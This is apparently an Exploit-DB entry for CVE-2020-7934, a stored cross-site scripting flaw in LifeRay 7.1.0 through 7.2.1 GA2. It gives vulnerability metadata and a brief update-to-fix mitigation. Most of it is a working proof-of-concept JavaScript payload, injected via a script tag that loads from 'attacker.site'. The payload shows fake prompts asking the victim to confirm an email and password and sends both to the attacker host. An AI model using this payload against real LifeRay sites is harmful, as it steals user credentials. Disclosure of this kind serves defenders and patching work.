LifeRay 7.2.1 GA2 - Stored XSS

vendor:

LifeRay

by:

3ndG4me

5.4

CVSS

MEDIUM

Stored XSS

CWE

Product Name: LifeRay

Affected Version From: 7.1.2000

Affected Version To: 7.2.1 GA2

Patch Exists: NO

Related CWE: CVE-2020-7934

CPE: a:liferay:liferay:7.1.0

Metasploit:

Other Scripts:

Platforms Tested: Debian Linux

2020

LifeRay 7.2.1 GA2 – Stored XSS

This exploit allows an attacker to execute malicious JavaScript code in a vulnerable field in LifeRay 7.2.1 GA2. The attacker can phish user credentials by prompting them to enter their email and password, which are then logged to the console and sent to the attacker's website.

Mitigation:

Update to a version of LifeRay that is not affected by this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS
# Date: 10/05/2020 
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/
# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED)
# Tested on: Debian Linux
# CVE : CVE-2020-7934
# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934

# NOTE: The attached proof of concept is a javascript payload,
submitted as a ".txt" file to attach via email as ".js" is often
blocked.

// CVE-2020-7934 Cred Phishing Example Attack
// Author: 3ndG4me
// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934

// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:
// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">

var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");
var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");


console.log(email);
console.log(password);

var url = "http://attacker.site/" + email + ":" + password;

$.get(url);